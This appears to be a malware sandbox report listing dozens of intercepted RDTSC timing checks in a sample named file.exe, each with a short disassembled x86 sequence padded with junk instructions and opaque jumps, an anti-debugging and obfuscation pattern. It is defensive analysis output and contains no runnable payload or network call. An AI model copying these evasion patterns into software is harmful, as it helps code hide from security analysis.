                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AAD9 second address: C6337C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBA693F36BCh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FBA693F36B8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jbe 00007FBA693F36BCh 0x00000033 mov dword ptr [ebp+122D2432h], edi 0x00000039 jno 00007FBA693F36B9h 0x0000003f call dword ptr [ebp+122D3525h] 0x00000045 pushad 0x00000046 push ecx 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 pop ecx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B129 second address: C7B1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 add dword ptr [esp], 1435E675h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FBA68C246D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D37A7h], edx 0x0000002f pushad 0x00000030 sub dword ptr [ebp+122D1FECh], edi 0x00000036 pushad 0x00000037 jno 00007FBA68C246D6h 0x0000003d mov esi, dword ptr [ebp+122D2B94h] 0x00000043 popad 0x00000044 popad 0x00000045 call 00007FBA68C246D9h 0x0000004a push edi 0x0000004b jo 00007FBA68C246DCh 0x00000051 jc 00007FBA68C246D6h 0x00000057 pop edi 0x00000058 push eax 0x00000059 ja 00007FBA68C246EEh 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B1B2 second address: C7B1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B1B8 second address: C7B1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B1BD second address: C7B1C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B1C4 second address: C7B1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007FBA68C246E2h 0x0000000f jbe 00007FBA68C246DCh 0x00000015 je 00007FBA68C246D6h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B1E9 second address: C7B1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FBA693F36B6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B334 second address: C7B396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBA68C246DBh 0x0000000f xchg eax, esi 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FBA68C246D8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jp 00007FBA68C246DCh 0x00000030 xor dword ptr [ebp+122D250Eh], ecx 0x00000036 nop 0x00000037 pushad 0x00000038 jmp 00007FBA68C246DFh 0x0000003d push eax 0x0000003e push edx 0x0000003f jno 00007FBA68C246D6h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B464 second address: C7B488 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FBA693F36B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FBA693F36C1h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BD76 second address: C7BD9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, dword ptr [ebp+122D2C74h] 0x00000010 lea eax, dword ptr [ebp+1248085Bh] 0x00000016 mov ecx, dword ptr [ebp+122D3300h] 0x0000001c mov ecx, eax 0x0000001e push eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BD9B second address: C63EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA693F36C7h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D25B1h], ecx 0x00000014 lea eax, dword ptr [ebp+12480817h] 0x0000001a mov edi, dword ptr [ebp+122D2CB8h] 0x00000020 jmp 00007FBA693F36BCh 0x00000025 push eax 0x00000026 push eax 0x00000027 jmp 00007FBA693F36C3h 0x0000002c pop eax 0x0000002d mov dword ptr [esp], eax 0x00000030 mov dword ptr [ebp+122D18ADh], edx 0x00000036 call dword ptr [ebp+122D3977h] 0x0000003c jmp 00007FBA693F36C0h 0x00000041 push ecx 0x00000042 pushad 0x00000043 push esi 0x00000044 pop esi 0x00000045 push eax 0x00000046 pop eax 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B3BC second address: C7B3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB86AB second address: CB86B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB86B1 second address: CB86B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB86B6 second address: CB86BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB86BB second address: CB86C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8822 second address: CB8840 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA693F36C3h 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB89AD second address: CB89B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB89B3 second address: CB89B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC58B second address: CBC596 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1BBC second address: CC1BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBA693F36BCh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0FF4 second address: CC1007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1007 second address: CC1015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBA693F36B6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1015 second address: CC102F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FBA68C246D6h 0x0000000c jne 00007FBA68C246D6h 0x00000012 popad 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC12B0 second address: CC12BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBA693F36B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC12BA second address: CC12BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC511F second address: CC512C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FBA693F36B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC512C second address: CC5134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A15 second address: CC7A23 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A23 second address: CC7A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A29 second address: CC7A63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBA693F36BBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jng 00007FBA693F36B6h 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 jnl 00007FBA693F36CBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A63 second address: CC7A6D instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA68C246D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A6D second address: CC7A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA693F36BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A82 second address: CC7A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1E49 second address: CD1E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD07DB second address: CD07FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E6h 0x00000009 jnp 00007FBA68C246D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AC4 second address: CD0AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBA693F36BCh 0x0000000c jmp 00007FBA693F36C7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AEE second address: CD0AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AFC second address: CD0B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA693F36C4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0B14 second address: CD0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0CA4 second address: CD0CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0CAA second address: CD0CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FBA68C246D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B832 second address: C7B838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B838 second address: C7B83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0F75 second address: CD0F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBA693F36C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0F9A second address: CD0FB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD10E3 second address: CD10E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD10E7 second address: CD10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA68C246D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3563 second address: CD358D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007FBA693F36B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jl 00007FBA693F36B6h 0x00000013 jo 00007FBA693F36B6h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jng 00007FBA693F36C2h 0x00000022 jno 00007FBA693F36B6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD358D second address: CD3595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69C0 second address: CD69C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69C4 second address: CD69CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69CF second address: CD69D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69D7 second address: CD69DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6E35 second address: CD6E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC8CD second address: CDC8D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007FBA68C246D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC8D8 second address: CDC8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC8E1 second address: CDC8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCB8A second address: CDCB90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCB90 second address: CDCB98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD11A second address: CDD11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD11E second address: CDD12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FBA68C246D6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD9B6 second address: CDD9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD9BB second address: CDD9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDCA9 second address: CDDCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36BBh 0x00000009 jg 00007FBA693F36B6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDCC1 second address: CDDD00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E7h 0x00000007 jmp 00007FBA68C246E3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA68C246DFh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDD00 second address: CDDD08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE1FA second address: CDE22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E6h 0x00000009 pop esi 0x0000000a push ecx 0x0000000b jmp 00007FBA68C246E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6A90 second address: CE6AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FBA693F36B6h 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007FBA693F36B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6AA6 second address: CE6AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6AC4 second address: CE6AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 ja 00007FBA693F3714h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBA693F36C5h 0x00000013 jnc 00007FBA693F36B6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6D95 second address: CE6D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6D99 second address: CE6DA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6DA5 second address: CE6DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FBA68C246E2h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FBA68C246D6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6DDD second address: CE6DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F0F second address: CE6F2F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FBA68C246E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF11E second address: CEF127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF127 second address: CEF134 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA68C246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED459 second address: CED46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jc 00007FBA693F36B6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED81D second address: CED82D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED82D second address: CED833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED833 second address: CED839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED839 second address: CED83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED83D second address: CED858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED858 second address: CED864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDDDB second address: CEDDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDDEA second address: CEDDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
